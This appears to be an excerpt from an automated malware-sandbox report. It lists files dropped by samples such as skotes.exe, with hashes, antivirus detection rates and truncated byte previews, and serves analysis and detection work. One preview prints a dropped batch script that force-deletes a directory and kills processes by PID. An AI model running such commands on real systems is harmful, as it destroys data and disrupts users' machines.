                                                                                                                                                              SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                              MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                              SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                              SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                              SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1960448
                                                                                                                                                              Entropy (8bit):7.952979469725424
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:5YAz9q+jtScoVpfghSXABehVC8tMBEmHYAW3v:x4+jtScwpRABehgxvHYD3v
                                                                                                                                                              MD5:914BC5E4CA51B1218F63A8539614DCBC
                                                                                                                                                              SHA1:5EDAB3B12041E423A1321BD656B55F7F6A3C76F9
                                                                                                                                                              SHA-256:E77EB409D5AB219632439EDDC1019746C132CA68CBDBF3F63DEDA117F010BB01
                                                                                                                                                              SHA-512:7D301C0E284CCFF3694108E48E027784A7292DD17B9C9746822B64D0415F26CC3D737D6F19A8BC912B4A44C9B262ABA00BAE5CD484C3E0B9B8DC63AC889229FB
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........J...........@...........................K.....|.....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... .`)..........V..............@...ocizazuj.p...P1..l...X..............@...tmlfxogw......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):765568
                                                                                                                                                              Entropy (8bit):7.855393940952922
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                              MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                              SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                              SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                              SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4466688
                                                                                                                                                              Entropy (8bit):7.985749267108354
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:98304:mUq/Rjfin/BjlBFxg28sXGOID18Radfg85LhEPse:mUyjeBjDFxg28UGO+9guhas
                                                                                                                                                              MD5:3287CE2D6BE3F77C5D1E7CC351F4AD5F
                                                                                                                                                              SHA1:D9F04B9C1D610402C10C27772169D9E911D9ADF5
                                                                                                                                                              SHA-256:7619900AF0011CD2B40BE259C52ACF7E7415532D002A09267BCFB823EA1F38C4
                                                                                                                                                              SHA-512:F3F99E918F412A511C1324E89359645A37933F855B3DA5214611906B861203AE6AAD20DAB6E04EE5BAE3FA134AE604CE61C08F9DE3CD2718FB1090F193477D95
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...0.......PD...@..........................`........D...@... ............................._.a.s.....a.....................,....................................................................................... . .pa......>(.................@....rsrc.........a......N(.............@....idata ......a......P(.............@... ..8...a......R(.............@...ahvfevpi.....p.......T(.............@...qgsnhtie..... ........D.............@....taggant.0...0..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):776832
                                                                                                                                                              Entropy (8bit):7.859727158445845
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                              MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                              SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                              SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                              SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Users\user\Desktop\random.exe_Y.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2985472
                                                                                                                                                              Entropy (8bit):6.575662109562546
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:gbeCjCycKq+4fXq3hnb/KoTaom8SayudX:gbeCj7cKqZfXq3hbVurayuJ
                                                                                                                                                              MD5:5C4D6B420293FBF347F649016FAB86F8
                                                                                                                                                              SHA1:242B846CA8D55D7D40527D2494A1A3D83E9CBA1E
                                                                                                                                                              SHA-256:2F423EA9129684A3F39D3CA8AEBC3C470F6895786C4277815307EDE64E160DEB
                                                                                                                                                              SHA-512:E0475C4F8954C40B41A5C56B9024CC5448F82C98877C0964679ACE18504255E68A7D6A334C7C29616FFB1FEF07B8FD23FB82A8D09C3DC3E30FCB6495EA808FDF
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................@1...........@..........................p1......k....@.................................W...k...........................\ 1.............................. 1..................................................... . ............................@....rsrc...............................@....idata ............................@...xswvdtxt..*......r*.................@...wvmigpas.....01......h-.............@....taggant.0...@1.."...l-.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\random.exe_Y.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):26
                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1679360
                                                                                                                                                              Entropy (8bit):6.278252955513617
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                              MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                              SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                              SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                              SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe
                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):468992
                                                                                                                                                              Entropy (8bit):6.157743912672224
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                              MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                              SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                              SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):222
                                                                                                                                                              Entropy (8bit):4.855194602218789
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                              MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                              SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                              SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                              SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2355713
                                                                                                                                                              Entropy (8bit):5.891648193754473
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                              MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                              SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                              SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                              SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1799594
                                                                                                                                                              Entropy (8bit):7.99773141173711
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                              MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                              SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                              SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                              SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1799748
                                                                                                                                                              Entropy (8bit):7.997729415613798
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                              MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                              SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                              SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                              SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1799902
                                                                                                                                                              Entropy (8bit):7.997726708945573
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                              MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                              SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                              SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                              SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                              Malicious:false
